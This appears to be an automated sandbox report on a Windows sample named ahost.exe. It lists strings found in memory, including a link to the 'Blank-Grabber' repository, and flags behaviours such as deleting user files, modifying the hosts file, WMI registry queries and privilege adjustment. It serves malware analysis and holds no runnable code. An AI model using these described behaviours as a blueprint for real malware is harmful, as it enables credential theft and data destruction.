Source: ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1601685173.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1643405350.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: ahost.exe, 00000002.00000002.1874902804.000002162D8D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871595223.000002162C540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: ahost.exe, 00000002.00000003.1397661863.000002162B9B1000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: ahost.exe, 00000002.00000003.1568400084.000002162CDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/produ
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C369000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617356386.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C364000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: ahost.exe, 00000002.00000003.1568400084.000002162CDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD08000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1874902804.000002162D8C0000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: ahost.exe, 00000002.00000003.1605942422.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1867424193.000002162C3D6000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871320397.000002162C3DA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: ahost.exe, 00000002.00000003.1586364986.000002162CD17000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C3F2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1878093732.00007FF8E72E9000.00000004.00000001.01000000.00000010.sdmp, ahost.exe, 00000002.00000002.1877130678.00007FF8E6C2A000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\ahost.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NHPKIZUUSG.jpg	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZSSZYEFYMU.pdf	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\AFWAAFRXKO.docx	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\AFWAAFRXKO.docx	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\HTAGVDFUIE.mp3	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\ahost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 73

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF8A3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

104_2_00007FF7CF8A3A70

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF8CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

104_2_00007FF7CF8CB57C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F92069D4	0_2_00007FF7F92069D4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E8BD0	0_2_00007FF7F91E8BD0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E1000	0_2_00007FF7F91E1000
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91FDACC	0_2_00007FF7F91FDACC
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9200938	0_2_00007FF7F9200938
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F8154	0_2_00007FF7F91F8154
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F920411C	0_2_00007FF7F920411C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F21D4	0_2_00007FF7F91F21D4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F19B4	0_2_00007FF7F91F19B4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F3A14	0_2_00007FF7F91F3A14
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9203C80	0_2_00007FF7F9203C80
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F2C80	0_2_00007FF7F91F2C80
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9200938	0_2_00007FF7F9200938
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9206488	0_2_00007FF7F9206488
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9205C70	0_2_00007FF7F9205C70
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91EA4E4	0_2_00007FF7F91EA4E4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91EA34B	0_2_00007FF7F91EA34B
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F1BC0	0_2_00007FF7F91F1BC0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F9F10	0_2_00007FF7F91F9F10
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9205EEC	0_2_00007FF7F9205EEC
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91EAD1D	0_2_00007FF7F91EAD1D
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F1DC4	0_2_00007FF7F91F1DC4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F5DA0	0_2_00007FF7F91F5DA0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F3610	0_2_00007FF7F91F3610
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91FE5E0	0_2_00007FF7F91FE5E0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E9870	0_2_00007FF7F91E9870
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F92018E4	0_2_00007FF7F92018E4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91FDF60	0_2_00007FF7F91FDF60
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F1FD0	0_2_00007FF7F91F1FD0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F9209798	0_2_00007FF7F9209798
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F17B0	0_2_00007FF7F91F17B0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91F8804	0_2_00007FF7F91F8804
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F92069D4	2_2_00007FF7F92069D4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E1000	2_2_00007FF7F91E1000
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91FDACC	2_2_00007FF7F91FDACC
